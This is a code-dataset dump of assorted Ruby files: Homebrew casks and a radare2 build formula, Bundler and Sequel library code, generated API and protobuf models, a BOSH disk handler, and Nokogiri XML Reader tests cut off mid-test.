hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
b98f02bc14186fb681f86e829c46c74412b0db60 | 421 | cask 'torbrowser-pt' do
# Homebrew Cask for the Portuguese (pt-PT) localized build of Tor Browser.
version '5.5.3'
sha256 '7f18a726e4e66f9e5a6efac2c8fa86feaac0297cc9d6f8c961370d814381b764'
url "https://dist.torproject.org/torbrowser/#{version}/TorBrowser-#{version}-osx64_pt-PT.dmg"
name 'Tor Browser'
homepage 'https://www.torproject.org/projects/torbrowser.html'
license :oss
# Detached GPG signature used to verify the downloaded DMG.
gpg "#{url}.asc",
key_id: 'ef6e286dda85ea2a4ba7de684e2c6e8793298290'
app 'TorBrowser.app'
end
| 30.071429 | 95 | 0.75772 |
61fa1889e81ea939ad2de6d2163635b61ecc1b27 | 4,594 | class Radare2 < Formula
desc "Reverse engineering framework"
homepage "https://radare.org"
revision 1
# Pinned release tarballs for radare2 plus its companion "bindings" and
# "extras" source trees, which are built below as resources.
stable do
url "https://radare.mikelloc.com/get/2.8.0/radare2-2.8.0.tar.gz"
sha256 "015c0b54cbeab2f055ca45ea57675ac5fcddb9be788249143e20bb64554a769e"
resource "bindings" do
url "https://radare.mikelloc.com/get/2.8.0/radare2-bindings-2.8.0.tar.gz"
sha256 "4a3b6e8101093033342e862b6834c92072bc6d902583dbca36b45a4684a4d40f"
end
resource "extras" do
url "https://radare.mikelloc.com/get/2.8.0/radare2-extras-2.8.0.tar.gz"
sha256 "f11f16faec355eddc509e3615e42b5c9de565858d68790a5c7591b6525488f75"
end
end
bottle do
sha256 "2e54078d5cff62cd5593ba2390a0f230e334b94024954e5b6329d52c0401aafc" => :mojave
sha256 "18dad4749aba2e1d3b5ecb55a1b3c55656bf0e604fc6e739b45a249809053a98" => :high_sierra
sha256 "67705968143b7235843ad4a494ffca8bbfb886168656a4171bb730dec615a0d2" => :sierra
end
head do
url "https://github.com/radare/radare2.git"
resource "bindings" do
url "https://github.com/radare/radare2-bindings.git"
end
resource "extras" do
url "https://github.com/radare/radare2-extras.git"
end
end
# Build-only toolchain (used while generating the language bindings).
depends_on "gobject-introspection" => :build
depends_on "pkg-config" => :build
depends_on "swig" => :build
depends_on "valabind" => :build
# Runtime dependencies.
depends_on "gmp"
depends_on "jansson"
depends_on "libewf"
depends_on "libmagic"
depends_on "lua"
depends_on "openssl"
depends_on "yara"
def install
# Build Radare2 before bindings, otherwise compile = nope.
system "./configure", "--prefix=#{prefix}", "--with-openssl"
system "make", "CS_PATCHES=0"
ENV.deparallelize { system "make", "install" }
# remove leftover symlinks
# https://github.com/radare/radare2/issues/8688
rm_f bin/"r2-docker"
rm_f bin/"r2-indent"
# Build the extras plugins against the radare2 just installed above.
resource("extras").stage do
ENV.append_path "PATH", bin
ENV.append_path "PKG_CONFIG_PATH", "#{lib}/pkgconfig"
(lib/"radare2/#{version}").mkpath
system "./configure", "--prefix=#{prefix}"
system "make", "R2PM_PLUGDIR=#{lib}/radare2/#{version}", "all"
system "make", "R2PM_PLUGDIR=#{lib}/radare2/#{version}", "install"
end
# Build the lua/perl/python language bindings.
resource("bindings").stage do
ENV.append_path "PATH", bin
ENV.append_path "PKG_CONFIG_PATH", "#{lib}/pkgconfig"
# Language versions.
# Host Perl version string (e.g. "5.18.2"); interpolated into PERLPATH below.
perl_version = `/usr/bin/perl -e 'printf "%vd", $^V;'`
# NOTE(review): this is a MatchData, not a String; it stringifies to
# "X.Y" where interpolated below.
lua_version = Formula["lua"].version.to_s.match(/\d\.\d/)
# Lazily bind to Python.
inreplace "do-swig.sh", "VALABINDFLAGS=\"\"", "VALABINDFLAGS=\"--nolibpython\""
make_binding_args = ["CFLAGS=-undefined dynamic_lookup"]
# Ensure that plugins and bindings are installed in the Cellar.
inreplace "libr/lang/p/Makefile" do |s|
s.gsub! "R2_PLUGIN_PATH=", "#R2_PLUGIN_PATH="
s.gsub! "~/.config/radare2/plugins", "#{lib}/radare2/#{version}"
end
# We don't want to place json.lua in lib/lua/#{lua_version} because
# the name is very generic, which introduces a strong possibility of
# clashes with other formulae or in general usage.
inreplace "libr/lang/p/lua.c",
'os.getenv(\"HOME\")..\"/.config/radare2/plugins/lua/?.lua;',
"\\\"#{libexec}/lua/#{lua_version}/?.lua;"
# Really the Lua libraries should be dumped in libexec too but
# since they're named fairly specifically it's semi-acceptable.
inreplace "Makefile" do |s|
s.gsub! "LUAPKG=", "#LUAPKG="
s.gsub! "${DESTDIR}$$_LUADIR", "#{lib}/lua/#{lua_version}"
s.gsub! "ls lua/*so*$$_LUAVER", "ls lua/*so"
end
make_install_args = %W[
R2_PLUGIN_PATH=#{lib}/radare2/#{version}
LUAPKG=lua-#{lua_version}
PERLPATH=#{lib}/perl5/site_perl/#{perl_version}
PYTHON_PKGDIR=#{lib}/python2.7/site-packages
RUBYPATH=#{lib}/ruby/#{RUBY_VERSION}
]
system "./configure", "--prefix=#{prefix}"
["lua", "perl", "python"].each do |binding|
system "make", "-C", binding, *make_binding_args
end
system "make"
system "make", "install", *make_install_args
# This should be being handled by the Makefile but for some reason
# it doesn't want to work. If this ever breaks it's likely because
# the Makefile has started functioning as expected & placing it in lib.
(libexec/"lua/#{lua_version}").install Dir["libr/lang/p/lua/*.lua"]
end
end
test do
assert_match "radare2 #{version}", shell_output("#{bin}/r2 -version")
end
end
| 34.80303 | 93 | 0.658903 |
f8aeba375583c23b0fd59e4f45e0d71d6955e000 | 641 | # frozen_string_literal: true
require 'test_helper'
# Integration test for the epochs/geo_map view: verifies the page renders
# and contains the expected navigation links for a signed-in user.
class EpochsGeoMapHtmlErbTest < ActionDispatch::IntegrationTest
setup do
# Fixtures: one epoch and a signed-in user shared by every test.
@epoch = epochs(:epoch_1)
@user = users(:users_1)
sign_in @user
end
test 'should map epoch' do
get geo_map_epoch_url(id: @epoch.id)
assert_response :success
# Navigation links rendered by the geo_map view.
assert_select 'a[text()=?]', 'Timeline'
assert_select 'a[href=?]', epoch_timeline_path(@epoch)
assert_select 'a[text()=?]', 'Display'
assert_select 'a[href=?]', epoch_display_path(@epoch)
assert_select 'a[text()=?]', 'Back'
# Footer is expected to contain exactly 3 links.
assert_select '.footer>div>a', 3
assert_template 'epochs/geo_map'
end
end
| 24.653846 | 63 | 0.686427 |
38e44d24abf0e7e1a1d594928e3bbfe2cf8ff654 | 3,042 | require 'rubygems/dependency'
require 'bundler/shared_helpers'
require 'bundler/rubygems_ext'
module Bundler
class Dependency < Gem::Dependency
attr_reader :autorequire
attr_reader :groups
attr_reader :platforms
PLATFORM_MAP = {
:ruby => Gem::Platform::RUBY,
:ruby_18 => Gem::Platform::RUBY,
:ruby_19 => Gem::Platform::RUBY,
:ruby_20 => Gem::Platform::RUBY,
:ruby_21 => Gem::Platform::RUBY,
:ruby_22 => Gem::Platform::RUBY,
:mri => Gem::Platform::RUBY,
:mri_18 => Gem::Platform::RUBY,
:mri_19 => Gem::Platform::RUBY,
:mri_20 => Gem::Platform::RUBY,
:mri_21 => Gem::Platform::RUBY,
:rbx => Gem::Platform::RUBY,
:jruby => Gem::Platform::JAVA,
:jruby_18 => Gem::Platform::JAVA,
:jruby_19 => Gem::Platform::JAVA,
:mswin => Gem::Platform::MSWIN,
:mswin_18 => Gem::Platform::MSWIN,
:mswin_19 => Gem::Platform::MSWIN,
:mswin_20 => Gem::Platform::MSWIN,
:mswin_21 => Gem::Platform::MSWIN,
:mswin64 => Gem::Platform::MSWIN64,
:mswin64_19 => Gem::Platform::MSWIN64,
:mswin64_20 => Gem::Platform::MSWIN64,
:mswin64_21 => Gem::Platform::MSWIN64,
:mingw => Gem::Platform::MINGW,
:mingw_18 => Gem::Platform::MINGW,
:mingw_19 => Gem::Platform::MINGW,
:mingw_20 => Gem::Platform::MINGW,
:mingw_21 => Gem::Platform::MINGW,
:x64_mingw => Gem::Platform::X64_MINGW,
:x64_mingw_20 => Gem::Platform::X64_MINGW,
:x64_mingw_21 => Gem::Platform::X64_MINGW
}.freeze
def initialize(name, version, options = {}, &blk)
type = options["type"] || :runtime
super(name, version, type)
@autorequire = nil
@groups = Array(options["group"] || :default).map { |g| g.to_sym }
@source = options["source"]
@platforms = Array(options["platforms"])
@env = options["env"]
if options.key?('require')
@autorequire = Array(options['require'] || [])
end
end
def gem_platforms(valid_platforms)
return valid_platforms if @platforms.empty?
platforms = []
@platforms.each do |p|
platform = PLATFORM_MAP[p]
next unless valid_platforms.include?(platform)
platforms |= [platform]
end
platforms
end
def should_include?
current_env? && current_platform?
end
def current_env?
return true unless @env
if @env.is_a?(Hash)
@env.all? do |key, val|
ENV[key.to_s] && (val.is_a?(String) ? ENV[key.to_s] == val : ENV[key.to_s] =~ val)
end
else
ENV[@env.to_s]
end
end
def current_platform?
return true if @platforms.empty?
@platforms.any? { |p|
Bundler.current_ruby.send("#{p}?")
}
end
def to_lock
out = super
out << '!' if source
out << "\n"
end
def specific?
super
rescue NoMethodError
requirement != ">= 0"
end
end
end
| 28.166667 | 92 | 0.571335 |
bb66c75b9561495d5cc01bb50bbcd81576886941 | 170 | class RootController < ApplicationController
# Landing action: currently redirects every visitor to their conferences list.
def index
# TODO: redirect to the user_sponsorship path when logged in
redirect_to user_conferences_path
end
end
| 24.285714 | 64 | 0.794118 |
1ccb4031159252079f9cb30ab397b59557e00842 | 6,557 | =begin
#Selling Partner API for Notifications
#The Selling Partner API for Notifications lets you subscribe to notifications that are relevant to a selling partner's business. Using this API you can create a destination to receive notifications, subscribe to notifications, delete notification subscriptions, and more.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.24
=end
require 'date'
module AmzSpApi::NotificationsApiModel
# The response schema for the deleteDestination operation.
# NOTE: swagger-codegen generated model — edits here should be kept in sync
# with the generator template.
class DeleteDestinationResponse
# Errors payload for the operation; typed as a generic Object by the
# generated schema (see self.openapi_types).
attr_accessor :errors
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'errors' => :'errors'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'errors' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::NotificationsApiModel::DeleteDestinationResponse` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::NotificationsApiModel::DeleteDestinationResponse`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'errors')
self.errors = attributes[:'errors']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
errors == o.errors
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[errors].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::NotificationsApiModel.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end end
end
| 31.524038 | 272 | 0.637029 |
1117003d24163eba029b5865ac3983ceaa15b7bc | 194 | FactoryGirl.define do
# Floating CloudNetwork backed by the Nuage network manager provider;
# inherits all other attributes from the :cloud_network factory.
factory :cloud_network_floating_nuage,
:class => "ManageIQ::Providers::Nuage::NetworkManager::CloudNetwork::Floating",
:parent => :cloud_network
end
| 32.333333 | 90 | 0.706186 |
b95fb75ed5ce78a958dc690513720f0cd83d354d | 226 | module Edlink
module Entities
# ApiStruct entity for a Source record returned by the Edlink API.
class Source < ApiStruct::Entity
# Attributes exposed straight from the API payload.
attr_entity :id,
:name,
:status,
:created_date,
:updated_date
end
end
end | 20.545455 | 36 | 0.477876 |
18de40d8bd5720faf4d5caed63827046efac8f24 | 163 | def logger_with_no_output
# Stub Logger.new with a null-object double so scenarios emit no log output.
logger = double('Logger').as_null_object
allow(Logger).to receive(:new).and_return(logger)
end
# Silence logging before every scenario.
Before do
logger_with_no_output
end | 20.375 | 51 | 0.797546 |
6ab5933dd0957b216da448707e530bd5368cec1f | 572 | cask 'disk-arbitrator' do
version '0.5'
sha256 'dcc05e6579a7ef3835cb06beb4c9e1dcc64f01128e91fc00cfc7e3a00876fd2a'
# kainjow.com is the official download host per the vendor homepage
url "https://kainjow.com/downloads/Disk%20Arbitrator-#{version}.dmg"
name 'Disk Arbitrator'
homepage 'https://github.com/aburgh/Disk-Arbitrator'
license :bsd
app 'Disk Arbitrator.app'
# Unload the launch agent and quit the running app on uninstall.
uninstall launchctl: 'us.burghardt.Disk-Arbitrator',
quit: 'us.burghardt.Disk-Arbitrator'
# Remove leftover preferences on `brew cask zap`.
zap delete: '~/Library/Preferences/us.burghardt.Disk-Arbitrator.plist'
end
| 31.777778 | 75 | 0.75 |
38664d0294ecd3c5d8c005ca54357e3362b42200 | 1,929 | module Regexp::Expression
class Subexpression < Regexp::Expression::Base
  # Walks the expression tree depth-first in pre-order, invoking the
  # block with (event, expression, index-within-parent):
  #
  # - subexpressions fire :enter when descended into and :exit when left,
  # - terminal expressions fire a single :visit,
  # - with include_self, self is bracketed by :enter/:exit at index 0.
  #
  # Without a block, returns an Enumerator; otherwise returns self.
  def traverse(include_self = false, &block)
    return enum_for(__method__, include_self) unless block

    block.call(:enter, self, 0) if include_self

    each_with_index do |child, idx|
      if child.terminal?
        block.call(:visit, child, idx)
      else
        block.call(:enter, child, idx)
        child.traverse(&block)
        block.call(:exit, child, idx)
      end
    end

    block.call(:exit, self, 0) if include_self
    self
  end
  alias walk traverse

  # Yields every expression (with its index within its parent) exactly
  # once, in pre-order. Returns an Enumerator when no block is given.
  def each_expression(include_self = false)
    return enum_for(__method__, include_self) unless block_given?

    traverse(include_self) do |event, exp, idx|
      yield(exp, idx) unless event == :exit
    end
  end

  # Maps the block over every expression, or collects [expression, index]
  # pairs when called without a block.
  def flat_map(include_self = false)
    collected = []
    each_expression(include_self) do |exp, idx|
      collected << (block_given? ? yield(exp, idx) : [exp, idx])
    end
    collected
  end
end
end
| 29.676923 | 78 | 0.646449 |
e83620fa2b26054116ac3104ac5ca03d5eb51d12 | 766 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/automl/v1/annotation_spec.proto
require 'google/protobuf'
require 'google/api/resource_pb'
require 'google/api/annotations_pb'
# Registers the AnnotationSpec message descriptor with the shared pool.
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/automl/v1/annotation_spec.proto", :syntax => :proto3) do
add_message "google.cloud.automl.v1.AnnotationSpec" do
optional :name, :string, 1
optional :display_name, :string, 2
optional :example_count, :int32, 9
end
end
end
module Google
module Cloud
module AutoML
module V1
# Ruby message class materialized from the descriptor registered above.
AnnotationSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.automl.v1.AnnotationSpec").msgclass
end
end
end
end
| 28.37037 | 131 | 0.736292 |
5db2e6aeea3c50d6703c16d53c3a65b660428871 | 2,308 | module Sequel
module Plugins
# The eager_each plugin makes calling each on an eager loaded dataset do eager loading.
# By default, each does not work on an eager loaded dataset, because each iterates
# over rows of the dataset as they come in, and to eagerly load you need to have all
# values up front. With the default associations code, you must call #all on an eagerly
# loaded dataset, as calling #each on an #eager dataset skips the eager loading, and calling
# #each on an #eager_graph dataset makes it yield plain hashes with columns from all
# tables, instead of yielding the instances of the main model.
#
# This plugin makes #each call #all for eagerly loaded datasets. As #all usually calls
# #each, this is a bit of issue, but this plugin resolves the issue by cloning the dataset
# and setting a new flag in the cloned dataset, so that each can check with the flag to
# determine whether it should call all.
#
# Usage:
#
# # Make all model subclass instances eagerly load for each (called before loading subclasses)
# Sequel::Model.plugin :eager_each
#
# # Make the Album class eagerly load for each
# Album.plugin :eager_each
module EagerEach
module DatasetMethods
# Don't call #all when attempting to load the columns.
def columns
if use_eager_all?
clone(:all_called=>true).columns
else
super
end
end
# Call #all instead of #each if eager loading,
# unless #each is being called by #all.
def each(&block)
if use_eager_all?
all(&block)
else
super
end
end
# If eager loading, clone the dataset and set a flag to let #each know not to call #all,
# to avoid the infinite loop.
def all(&block)
if use_eager_all?
clone(:all_called=>true).all(&block)
else
super
end
end
private
# Whether to use #all when #each is called; true when eager loading
# unless the :all_called flag has already been set on this clone.
def use_eager_all?
(opts[:eager] || opts[:eager_graph]) && !opts[:all_called]
end
end
end
end
end
| 35.507692 | 100 | 0.625217 |
011131de0b4567b7bd705baed92b9ecde03defe2 | 3,012 | # Copyright (c) 2009-2012 VMware, Inc.
module Bosh::Director
module ProblemHandlers
# Problem handler for a persistent disk that exists in the director's
# database but is not marked active for its instance. Offers three
# resolutions: ignore, delete the disk, or activate it.
class InactiveDisk < Base
register_as :inactive_disk
auto_resolution :ignore
# @param disk_id [Integer] id of the Models::PersistentDisk row
# @param data [Hash] additional problem payload (stored, not interpreted here)
def initialize(disk_id, data)
super
@disk_id = disk_id
@data = data
@disk = Models::PersistentDisk[@disk_id]
if @disk.nil?
handler_error("Disk `#{@disk_id}' is no longer in the database")
end
if @disk.active
handler_error("Disk `#{@disk.disk_cid}' is no longer inactive")
end
@instance = @disk.instance
if @instance.nil?
handler_error("Cannot find instance for disk `#{@disk.disk_cid}'")
end
@vm = @instance.vm
end
# Operator-facing one-line summary of the problem.
def description
job = @instance.job || "unknown job"
index = @instance.index || "unknown index"
disk_label = "`#{@disk.disk_cid}' (#{job}/#{index}, #{@disk.size.to_i}M)"
"Disk #{disk_label} is inactive"
end
resolution :ignore do
plan { "Ignore problem" }
action { }
end
resolution :delete_disk do
plan { "Delete disk" }
action { delete_disk }
end
resolution :activate_disk do
plan { "Activate disk" }
action { activate_disk }
end
# Marks the disk active, provided it is mounted and the instance has no
# other active disk.
def activate_disk
unless disk_mounted?
handler_error("Disk is not mounted")
end
# Currently the director allows ONLY one persistent disk per
# instance. We are about to activate a disk but the instance already
# has an active disk.
# For now let's be conservative and return an error.
if @instance.persistent_disk
handler_error("Instance already has an active disk")
end
@disk.active = true
@disk.save
end
# Detaches the disk (best effort), deletes it in the cloud, and removes
# its database record. Refuses to run while the disk is in use.
def delete_disk
if disk_mounted?
handler_error("Disk is currently in use")
end
if @vm
begin
cloud.detach_disk(@vm.cid, @disk.disk_cid)
rescue => e
# We are going to delete this disk anyway
# and we know it's not in use, so we can ignore
# detach errors here.
@logger.warn(e)
end
end
# FIXME: Currently there is no good way to know if delete_disk
# failed because of cloud error or because disk doesn't exist
# in vsphere_disks.
begin
cloud.delete_disk(@disk.disk_cid)
rescue Bosh::Clouds::DiskNotFound, RuntimeError => e # FIXME
@logger.warn(e)
end
@disk.destroy
end
# True when the agent on the VM reports the disk CID in its disk list.
def disk_mounted?
return false if @vm.nil?
begin
agent_timeout_guard(@vm) do |agent|
agent.list_disk.include?(@disk.disk_cid)
end
rescue RuntimeError
# old stemcells without 'list_disk' support. We need to play
# conservative and assume that the disk is mounted.
true
end
end
end
end
end
| 26.654867 | 81 | 0.569721 |
3891f41501e6a32dca20bc801e49871679c38b9d | 175 | require File.expand_path('../../../spec_helper', __FILE__)
ruby_version_is "1.9" do
describe "Dir#to_path" do
# Placeholder example: declared without a block, so the runner reports it
# as unimplemented/pending until real assertions are written.
it "needs to be reviewed for spec completeness"
end
end
| 21.875 | 58 | 0.708571 |
4ab9ad8daa80f8adda637e0f5d250fd0928bc387 | 20,163 | # -*- coding: utf-8 -*-
require "helper"
module Nokogiri
module XML
class TestReader < Nokogiri::TestCase
def test_from_io_sets_io_as_source
io = File.open SNUGGLES_FILE
reader = Nokogiri::XML::Reader.from_io(io)
assert_equal io, reader.source
end
def test_empty_element?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<xml><city>Paris</city><state/></xml>
eoxml
results = reader.map do |node|
if node.node_type == Nokogiri::XML::Node::ELEMENT_NODE
node.empty_element?
end
end
assert_equal [false, false, nil, nil, true, nil], results
end
def test_self_closing?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<xml><city>Paris</city><state/></xml>
eoxml
results = reader.map do |node|
if node.node_type == Nokogiri::XML::Node::ELEMENT_NODE
node.self_closing?
end
end
assert_equal [false, false, nil, nil, true, nil], results
end
# Issue #831
# Make sure that the reader doesn't block reading the entire input
def test_reader_blocking
rd, wr = IO.pipe()
node_out = nil
# Reader thread: consume exactly one node, then close its end of the pipe.
t = Thread.start do
reader = Nokogiri::XML::Reader(rd, 'UTF-8')
reader.each do |node|
node_out = node
break
end
rd.close
end
sleep(1) # sleep for one second to make sure the reader will actually block for input
begin
wr.puts "<foo>"
wr.puts "<bar/>" * 10000
wr.flush
rescue Errno::EPIPE
# Expected when the reader thread has already closed its end of the pipe.
end
res = t.join(5) # wait 5 seconds for the thread to finish
wr.close
refute_nil node_out, "Didn't read any nodes, exclude the trivial case"
refute_nil res, "Reader blocks trying to read the entire stream"
end
def test_reader_takes_block
options = nil
Nokogiri::XML::Reader(File.read(XML_FILE), XML_FILE) do |cfg|
options = cfg
options.nonet.nowarning.dtdattr
end
assert options.nonet?
assert options.nowarning?
assert options.dtdattr?
end
def test_nil_raises
assert_raises(ArgumentError) {
Nokogiri::XML::Reader.from_memory(nil)
}
assert_raises(ArgumentError) {
Nokogiri::XML::Reader.from_io(nil)
}
end
def test_from_io
io = File.open SNUGGLES_FILE
reader = Nokogiri::XML::Reader.from_io(io)
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
def test_io
io = File.open SNUGGLES_FILE
reader = Nokogiri::XML::Reader(io)
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
def test_string_io
io = StringIO.new(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
reader = Nokogiri::XML::Reader(io)
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
# Misbehaving IO stand-in: read(size) returns size**10 bytes — far more
# than requested — to exercise the Reader's handling of bad IO objects.
class ReallyBadIO
  def read(size)
    bytes_to_return = size ** 10
    'a' * bytes_to_return
  end
end
# JRuby variant of the misbehaving IO: read may be invoked with no
# argument, so size defaults to 1; still returns size**10 bytes.
class ReallyBadIO4Java
  def read(size = 1)
    payload_length = size ** 10
    'a' * payload_length
  end
end
def test_io_that_reads_too_much
if Nokogiri.jruby?
io = ReallyBadIO4Java.new
Nokogiri::XML::Reader(io)
else
io = ReallyBadIO.new
Nokogiri::XML::Reader(io)
end
end
def test_in_memory
assert Nokogiri::XML::Reader(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
end
def test_reader_holds_on_to_string
xml = <<-eoxml
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
reader = Nokogiri::XML::Reader(xml)
assert_equal xml, reader.source
end
def test_default?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
def test_value?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal false, reader.value?
assert_equal [false, true, false, true, false, true, false],
reader.map(&:value?)
end
def test_read_error_document
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
<foo>
</x>
eoxml
assert_raises(Nokogiri::XML::SyntaxError) do
reader.each { |node| }
end
assert 1, reader.errors.length
end
def test_errors_is_an_array
reader = Nokogiri::XML::Reader(StringIO.new('&bogus;'))
assert_raises(SyntaxError) {
reader.read
}
assert_equal [SyntaxError], reader.errors.map(&:class)
end
def test_pushing_to_non_array_raises_TypeError
skip "TODO: JRuby ext does not internally call `errors`" if Nokogiri.jruby?
reader = Nokogiri::XML::Reader(StringIO.new('&bogus;'))
def reader.errors
1
end
assert_raises(TypeError) {
reader.read
}
end
def test_attributes?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal false, reader.attributes?
assert_equal [true, false, true, false, true, false, true],
reader.map(&:attributes?)
end
def test_attributes
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'
xmlns='http://mothership.connection.com/'
>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal({}, reader.attributes)
assert_equal [{'xmlns:tenderlove'=>'http://tenderlovemaking.com/',
'xmlns'=>'http://mothership.connection.com/'},
{}, {"awesome"=>"true"}, {}, {"awesome"=>"true"}, {},
{'xmlns:tenderlove'=>'http://tenderlovemaking.com/',
'xmlns'=>'http://mothership.connection.com/'}],
reader.map(&:attributes)
end
def test_attribute_roundtrip
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'
xmlns='http://mothership.connection.com/'
>
<tenderlove:foo awesome='true' size='giant'>snuggles!</tenderlove:foo>
</x>
eoxml
reader.each do |node|
node.attributes.each do |key, value|
assert_equal value, node.attribute(key)
end
end
end
def test_attribute_at
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.attribute_at(nil)
assert_nil reader.attribute_at(0)
assert_equal ['http://tenderlovemaking.com/', nil, 'true', nil, 'true', nil, 'http://tenderlovemaking.com/'],
reader.map { |x| x.attribute_at(0) }
end
def test_attribute
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.attribute(nil)
assert_nil reader.attribute('awesome')
assert_equal [nil, nil, 'true', nil, 'true', nil, nil],
reader.map { |x| x.attribute('awesome') }
end
def test_attribute_length
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
